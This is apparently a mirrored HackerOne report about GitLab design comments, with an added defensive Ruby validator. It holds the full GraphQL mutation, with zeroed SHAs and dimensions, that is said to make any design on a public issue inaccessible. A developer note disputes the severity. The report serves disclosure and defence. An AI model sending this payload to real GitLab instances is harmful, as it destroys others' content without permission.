ESCALATED: Destroying designs in public issues without any permission
HackerOne report #735282 by rpadovani on 2019-11-11, assigned to @cmaxim:
Developer note from @.luke: No data is destroyed and the user is permitted to perform this action. See #36493 (comment 246244742).
Summary
Any user can remove any design from any public issue
Steps to reproduce
Alice attaches a design to a public issue in a public project.
Bob has no membership in the project or in its parent group.
Still, Bob can comment on the design.
Using GraphQL, Bob can post a comment that is syntactically valid but whose content is broken. The broken content makes the design completely inaccessible.
Given the public ID of any design attachment, the attacker can submit this GraphQL mutation:
mutation {
  createImageDiffNote(input: {
    noteableId: "gid://gitlab/DesignManagement::Design/2329"
    position: {
      headSha: "0",
      startSha: "0",
      paths: {
        oldPath: "x",
        newPath: "x"
      },
      x: 0,
      y: 0,
      width: 0,
      height: 0
    },
    body: "test"
  }) {
    errors
    note {
      id
    }
  }
}
The mutation succeeds, and the design disappears from the issue.
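Added example, not GitLab's code or the reporter's: a server-side validator for the position object of a design note, rejecting a payload of the shape shown above before it is persisted. Field names follow the mutation; the rules (full 40-hex SHAs, positive size, marker inside the image, paths equal to the design's filename) and the design_filename parameter are assumptions about what a well-formed position looks like.

```ruby
SHA_RE = /\A[0-9a-f]{40}\z/.freeze

# Returns a list of human-readable errors; an empty list means the position
# is acceptable. design_filename is the file the note is being attached to.
def design_position_errors(position, design_filename:)
  errors = []

  # Both SHAs must be full commit SHAs (assumption: a bare "0" is not renderable).
  %w[headSha startSha].each do |key|
    errors << "#{key} is not a full commit SHA" unless position[key].to_s.match?(SHA_RE)
  end

  # The diff paths must point at the design the note is attached to.
  paths = position.fetch("paths", {})
  unless paths["oldPath"] == design_filename && paths["newPath"] == design_filename
    errors << "paths must reference the design's own filename"
  end

  # Image dimensions must be positive integers...
  %w[width height].each do |key|
    v = position[key]
    errors << "#{key} must be a positive integer" unless v.is_a?(Integer) && v.positive?
  end

  # ...and the marker must lie inside those dimensions.
  width, height, x, y = position.values_at("width", "height", "x", "y")
  if [width, height, x, y].all?(Integer) && !(x.between?(0, width) && y.between?(0, height))
    errors << "x/y must lie inside the image bounds"
  end

  errors
end

# Constructed payloads: the position from the report, and a well-formed note on an 800x600 design.
BROKEN_POSITION = {
  "headSha" => "0", "startSha" => "0",
  "paths" => { "oldPath" => "x", "newPath" => "x" },
  "x" => 0, "y" => 0, "width" => 0, "height" => 0
}.freeze

VALID_POSITION = {
  "headSha" => "a" * 40, "startSha" => "b" * 40,
  "paths" => { "oldPath" => "logo.png", "newPath" => "logo.png" },
  "x" => 120, "y" => 40, "width" => 800, "height" => 600
}.freeze

puts design_position_errors(BROKEN_POSITION, design_filename: "logo.png") if __FILE__ == $PROGRAM_NAME
```

Running it prints five rejection reasons for the report's payload and none for the well-formed one.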
Impact
DoS of the design feature.
Output of checks
This bug happens on GitLab.com.
Impact
Destroying resources over which the attacker has no permission.